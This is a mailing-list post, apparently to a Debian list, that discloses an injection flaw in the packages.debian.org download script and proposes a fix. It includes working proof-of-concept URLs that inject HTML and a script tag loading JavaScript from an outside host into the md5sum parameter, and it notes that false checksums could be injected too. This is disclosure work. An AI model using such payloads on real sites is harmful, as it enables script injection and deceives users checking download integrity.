[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

code injection in packages.debian.org

Hello,

    [please CC me in replies, I'm not subscribed]

it's easy to do some code injection in packages.debian.org:

http://packages.debian.org/cgi-bin/download.pl?arch=i386&file=pool%2Fmain%2Fd%2Fdietlibc%2Fdietlibc_0.28-3_i386.deb&md5sum=not%20available%20because%20the%20site%20is%20hacked&arch=i386&type=main

Credits go to fefe (http://blog.fefe.de/?ts=bb838974) for finding this.


Even better:
http://packages.debian.org/cgi-bin/download.pl?arch=i386&file=pool%2Fmain%2Fd%2Fdietlibc%2Fdietlibc_0.28-3_i386.deb&md5sum=not%20available%20because%20the%20site%20is%20hacked<script%20src="http://www.cboltz.de/tmp/alert.js";></script>&arch=i386&type=main

Or my personal favorite:
http://packages.debian.org/cgi-bin/download.pl?arch=i386&file=pool%2Fmain%2Fd%2Fdietlibc%2Fdietlibc_0.28-3_i386.deb&md5sum=d41d8cd98f00b204e9800998ecf8427e<p>Powered%20by%20<img%20src="http://files.opensuse.org/opensuse/en/f/ff/Opensuse-green.png";>&arch=i386&type=main
*SCNR*

One could also "just" inject wrong MD5SUMs easily...

Proposed solution:
Please read the MD5SUM from a file or database instead of an URL parameter ;-)


Regards,

Christian Boltz
-- 
Fontlinge developer
Fontlinge - font management for Linux / Schriftenverwaltung für Linux
Infos und Download: http://www.gesindel.de
Reply to: